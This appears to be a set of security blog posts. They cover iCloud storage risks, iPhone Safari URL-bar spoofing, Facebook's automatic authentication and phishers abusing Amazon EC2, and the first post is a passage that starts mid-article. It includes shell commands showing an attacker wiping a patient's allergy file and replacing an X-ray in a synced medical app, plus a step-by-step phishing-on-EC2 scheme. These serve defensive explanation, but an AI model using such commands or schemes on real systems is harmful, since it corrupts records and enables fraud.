It is clear that Apple uses the Bundle Seed ID (Team ID) to constrain access to user data in iCloud between different organizations.As discussed earlier, if someone were to get Apple’s provisioning portal to issue a provisioning profile with someone else’s Team ID, they could write Apps that can (at least locally) have access to the user’s iCloud data since their local iCloud file:// mapping will coincide.
Do not store critical information in iCloud containers, including session data. iCloud data is stored locally and synced to the iCloud infrastructure. Users often have multiple devices (iPhone, iPod Touch, iPad, Macbook, iMac) so their iCloud data will be automatically synced across devices. If a malicious entity were to temporarily gain access to the file-system (by having physical access or by implanting malware), he or she could gain access to the iCloud local containers (/private/var/mobile/Library/Mobile Documents/ in iOS and ~/Library/Mobile Documents/ in OSX). It is therefore a good idea not to store critical information such as session tokens, passwords, financial, and or healthcare data that is personally identifiable.
Do not trust data in your iCloud to commit critical transactions. As discussed in the prior paragraph, an attacker with temporary access to a user’s file system can access iCloud documents stored locally. Note that the attacker can also edit or add files into the iCloud containers and the changes will be synced across devices.
Figure 11: Sample medical app that leverages iCloud to store patient data
Assume a hospital were to deploy an iCloud enabled medical app to be used by doctors such as the screenshot in Figure 11. If an attacker were to gain access to the doctor’s Macbook Air running OSX for example, they could look at the local filesystem:
$ cd ~/Library/Mobile Documents/46Q6HN4L88~com~hospital~app/Documents
$ ls
Allergies.txt 1.TIFF
$ cat /dev/null > Allergies.txt
$ cp ~/Downloads/1.TIFF 1.TIFF
Once the attacker has issued the commands above, the doctor’s iCloud container will be updated with the modified information across all devices. In this example, the attacker has altered a particular patient’s record to remove listed allergies and replace the X-Ray image.
Figure 12: Updated medical record after intruder gains temporary access to Doctor’s Macbook Air
The doctor will see the updated record when the medical app is accessed after the attacker makes these changes on the doctor’s Macbook Air (Figure 12).
Store files in the Documents directory. Users can delete individual files in their iCloud accounts if they are stored in the ‘Documents’ directory:
Other files will be treated as data and can only be deleted all at once. Doing this can allow users to notify you if a bug in your application is causing too much data to be written into iCloud which can exhaust users' storage quotas and thus create a denial of service condition.
Take care to handle conflicts appropriately. Documents that are edited on multiple devices are likely to cause conflicts. Depending upon the logic of your application code, it is important to make sure you handle these conflicts so that the integrity of the user’s data is preserved.
Understand that Apple has the capability to see your users' iCloud data. Data from the local device to the iCloud infrastructure is encrypted during transmit. However, note that Apple has the capability to look at your users' data. There is low probability that Apple would choose to do this but depending upon your business, there may be regulatory and legal issues that may prohibit storage of certain data on the iCloud.
iOS sandboxing vulnerabilities may be exploited by rogue apps. Try putting in the string @”..\..\Documents” in URLByAppendingPathComponent or editing your container identifier in your entitlements to contain “..” or any other special characters. You will note that iOS will either trap your attempt at runtime or replace special characters that can cause an app to break out of the local iCloud directory. If someone were to find a vulnerability in iOS sandboxing or file parsing mechanisms, it is possible they can leverage this to build a rogue app that is able to access another app’s iCloud data.
These security principles also apply to key-value data storage. The iCloud Storage APIs also allow the storage of key-value data in addition to documents. The security tips outlined in this article also apply to key-value storage APIs.
Watch out for iCloud backups. As presented in the earlier section, the user can choose to backup his or her phone data into the iCloud. This includes the Documents/ portion within the app sand-box (Note: This is not the Documents folder created as part of the iCloud container, but is present as part the application bundle). If there is critical information you do not wish to preserve move it to Library/Caches. You may also wish to leverage the addSkipBackupAttributeToItemAtURL method to identify specific directories that should not be backed up.
I hope this article contained information to help you and your organization think through security issues and principles surrounding iCloud. The ultimate goal is to enable technology, but in a way that is cognizant of the associated risks. Feel free to get in touch if you have any comments, questions, or suggestions.
Popular web browsers today do not allow arbitrary websites to modify the text displayed in the address bar or to hide the address bar (some browsers may allow popups to hide the address bar but in such cases the URL is then displayed in the title of the window). The reasoning behind this behavior is quite simple: if browsers can be influenced by arbitrary web applications to hide the URL or to modify how it is displayed, then malicious web applications can spoof User Interface elements to display arbitrary URLs thus tricking the user to thinking he or she is browsing a trusted site.
I’d like to call your attention to the behavior of Safari on the iPhone via a proof of concept demo. If you have an iPhone, browse to the following demo and keep an eye out on the address bar:
For those who do not have an iPhone available, here is a video:
And here are two images detailing the issue.
Figure: Image on left illustrates the page rendered which displays the ‘fake’ URL bar while the real URL bar is hidden above. Image on right illustrates the real URL bar that is visible once the user scrolls up.
Notice that the address bar stays visible while the page renders, but immediately disappears as soon as it is rendered. Perhaps this may give the user some time to notice but it is not a reasonably reliable control (and I don’t think Apple intended it to be).
I did contact Apple about this issue and they let me know they are aware of the implications but do not know when and how they will address the issue.
I have two main thoughts on this behavior, outlined below:
1. Precious screen real estate on mobile devices. This is most likely the primary reason why the address bar disappears upon page load on the iPhone. Note that on the iPhone, this only happens for websites that follow directives in HTML to advertise themselves as mobile sites (see the source of the index.html in the demo site above for example).
Since the address bar in Safari occupies considerable real estate, perhaps Apple may consider displaying or scrolling the current domain name right below the universal status bar (i.e. below the carrier and time stamp). Positioning the current domain context in a location that is unalterable by the rendered web content can provide the users similar indication that browsers such as IE and Chrome provide by highlighting the current domain being rendered.
2. The consequences of full screen apps in iOS using UIWebView. Desktop operating systems most often launch the default web browser of choice when a http or https handler is invoked (this is most often the case even though the operating systems provide interface elements that can be used to render web content within the applications).
However, in the case of iOS, since most applications are full-screen, it is in the interest of the application designers to keep the users immersed within their application instead of yanking the user out into Safari to render web content. Given this situation, it becomes vital for iOS to provide consistency so the user can be ultimately assured what domain the web content is being rendered from.
To render web content within applications, all developers have to do is invoke the UIWebView class. It is as simple as invoking a line of code such as [webView loadRequest:requestObj]; where requestObj contains the URL to render.
Figure: Twitter App rendering web content on the iPad.
The screenshot above illustrates web-content rendered by the fantastic Twitter app on the iPad. To create this screen-shot, I launched the Twitter app on the iPad and selected a tweet from @appleinsider and clicked on the URL http://dlvr.it/9D81j in the tweet. Notice that the URL of the actual page being rendered is no where to be seen.
In such cases, it is clear that developers of iOS applications need to make sure they clearly display the ultimate domain from which they are rending web content. A welcome addition to this would be default behavior on part of UIWebView to display the current domain context in a designated and consistent location.
Given how rampant phishing and malware attempts are these days, I hope Apple chooses to not allow arbitrary web applications to scroll the real Safari address bar out of view. In the case of applications that utilize UIWebView, I recommend a designated screen location label only accessible by iOS that displays the domain from where the web content is being rendered when serving requests via calls to UIWebView. That said, I do realize how precious real estate is on mobile devices and if Apple choses to come up with a better way of addressing this issue, I'd welcome that as well.
Facebook users have been repeatedly warned and educated to comprehend the reality that 3rd party Facebook applications can consume their private information. As such, many users have begun to expect a fair warning (illustrated in the figure below) that includes an explicit authorization request from the Facebook platform,when a 3rd party Facebook application is accessed.
Image: Facebook platform requesting authorization from user prior to enabling 3rd party application
“Automatic authentication means that if a user visits an application canvas page (whether it's an FBML- or iframe-based canvas page), Facebook will pass that visitor's user ID to the application, even if the user has not authorized the application. The UID also gets passed when a user interacts with another user's application tab.
With this ID, the application can access the following data for most users (except for users who have chosen to not display a public search listing):
name
friends
Pages fanned
profile picture
gender
current location
networks (regional affiliations only)
list of friends”
The ‘Automatic Authentication’ feature is not new - it has been in place since July 2008. The reason I’m bringing this into attention today is for the following reasons:
Even the more privacy savy individuals are not aware of this ‘feature’. Individuals who have made the effort to learn about Facebook’s privacy settings are unlikely to be aware of this capability. Many of these users are likely to go trigger-happy by clicking on URLs within Facebook because they rely on the Facebook platform to ask for explicit authorization upon clicking on a 3rd party application page.
The implications of publicly available data and the potential ability of
a rogue 3rd party to uncloak a specific user’s identity are mutually
exclusive issues.
In their explanation on the developer wiki, Facebook explicitly states that 3rd party applications that use this feature can only gather information about the given user that may be publicly search-able anyway.
However, this assurance from Facebook is without merit because the implied reasoning is based upon flawed assumptions: the act of users choosing to make some of their information publicly search-able does not imply in any way that the users are granting the ability for rogue 3rd party applications to uncloak their identity (and data). Here is a simple example: my name is Nitesh Dhanjani and the information on my blog is public - however my web browser vendor cannot use this as a reasonable excuse to uncloak my identity to 3rd party web applications I visit.
The widening delta between the granularity of controls provided by social media platforms and the controls demanded by privacy advocates may lead to the need for client-side controls.
Image: The fb_fromhash parameter
For example, users that land upon Facebook applications will notice a parameter called _fb_fromhash which is present regardless of what authorization mechanism the 3rd party Facebook application chooses to use. This can be potentially leveraged to create a browser side control (example: Firefox plug-in) to warn the user that he or she may be accessing a 3rd party application that has the ability to automatically capture his or her identity. In other words, I foresee the need for a client side model to bridge the gap between privacy controls provided by vendors of social platforms versus the needs of individual users. Social-privacy-client-IDS, if you want to call it that.
Indeed, there is the clear rule of thumb pertaining to the use of online social applications: don’t put anything online that you wouldn’t want to persist in the public domain. However, this does not mean that brands in the business of providing us social platforms can go scott free. I sincerely hope the data contained in this post has provided you some additional information on how ‘automatic authentication' works, including the implications of which, in case you were not aware of it prior.
As a technology enthusiast first, and an information security professional second, I admire the internal complexity, external simplicity, and sheer power offered by Amazon's cloud computing services. Academics have forever fantasized about instant-on-pay-per-use-grid-computing. Amazon has been able to turn this into reality. The advent of utility computing indicates progress: it is 2009 - most of us shouldn't have to dwell on organizing computing infrastructure - rather, most of us should be able to take computing for granted so we can create great things with it.
I'd like to discuss how the EC2 service, as it stands currently, can and is being abused by criminals. I'm not the first person to bring up this problem, yet it is an important issue that is worthy of further discussion because it exposes an extraordinarily powerful infrastructure into the hands of cyber-criminals.
For the purpose of this conversation, I want to take upon how the criminals in the phishing underground are likely to benefit from Amazon's EC2 because it ties back to what I feel is the root issue (the credit card system). I'd also like to invite you to read an interview with Billy Rios and me, titled Spies in the Phishing Underground, to gain some further background on the characteristics of the average phisher, common tools used, and how the criminals are able to communicate and trade knowledge.
In order to setup a phishing site, the first task a criminal has to complete is to compromise and gain access (or obtain by way of bartering) to a server on the Internet. The next thing the phisher is likely to do is to un-archive a ready-made phishing-kit (HTML, JavaScript, and images representing the target organization's logo, in addition to a server side script that is responsible for collecting the POST variables and emailing them to a static email address owned by the phisher) in the web-root of the web server running on the compromised host. And there you have it, a fully working phishing site.
A typical phishing site is found out by the targeted organization via customer complaints or by the aid of community driving anti-phishing efforts (example: Phishtank). Once this happens, the ISP who owns the IP address of the compromised host is identified and contacted. All of this happens within a matter of hours. In other words, the time-to-live of phishing sites is less than a day, if even a few hours. This promotes a whack-a-mole approach to the problem: criminals setup phishing sites as fast as they can, while organizations that are targeted must locate them and attempt to shut them down by contacting the ISPs.
The goal of the targeted institutions is to play the whack-a-mole game faster: find the phishing sites as fast as possible and shut them down before their customer data is stolen.
On the other hand, the goal of the phisher is to play the whack-a-mole game harder: quickly spawn new instances of phishing websites and lure potential victims to submitting their information. Because the time-to-live of phishing sites is only a matter of hours, it is in the best interest of the criminals to continue to seek out faster methods of spawning new instances of phishing sites. This is why Amazon EC2 is a ripe platform for the phishers. If you are a phisher, this is the process you can follow to abuse the EC2 platform:
Sign up for an Amazon account and EC2 service using a single stolen credit card.
Configure an EC2 virtual instance (AMI) to host a phishing site.
Spawn n instances of the AMI. Phishing sites are now active (if the default number of instances a new customer is allowed to create is low, the phisher will have to create m Amazon accounts in step 1. to get n X m instances if that is the goal).
Collect thousands of additional credit card numbers in a matter of hours.
Amazon is likely to be notified of the phishing sites and will terminate the account and all associated AMIs. No problem. Just select one credit card out of the hundreds or thousands you have likely to have captured in step 4 and go back to to Step 1.
Do you see the problem at hand? EC2 is an extraordinarily powerful infrastructure available to anyone with a stolen credit card. Even if someone is able to use the EC2 platform for a few hours with a stolen credit card, he or she will be able to initiate a vicious cycle that may become impossible to halt.
I feel that the root cause of this situation is that credit institutions, based on weighing lost revenue to the amount of fraud committed, have decided to accept the fraud because the cost of instituting a more secure mechanism (biometric or 2-factor, for example) is higher than the cost of the fraud. Profitable institutions have the right to make a business decision such as this, but the problem in this scenario is that the cost of the fraud due to credit card transactions, which are insecure by design (the credit-card system is based on a static number that never changes), is also borne by merchants such as Amazon and also the organizations that run business using the Amazon cloud, yet this cost is not figured into the original business decision.
I think this is a disappointing situation. From a business perspective, I sympathize with Amazon - here is a company that wants to offer bleeding-edge innovation to the masses, yet they are unable to find an alternative to the credit-card system without having to compromise and make it difficult for the legitimate people to also use the service. Even so, I am glad that Amazon continues to offer their platform to the masses. Innovation should be allowed to drive forward. Always.
It isn't within the scope of this write-up to consider technical tactics Amazon could use to lower the impact and probability of the problem (but feel free to comment if you want to discuss). However, I do wish that Amazon did a better job of setting up a clear channel of communication so information security researchers and administrators are easily able to reach them. I have been asked for advice by some organizations who have noted denial of service attacks launched their way, originating from the Amazon cloud space, and I'm told it often seems next to impossible to reach anyone at Amazon who knows or cares enough to look into the matter.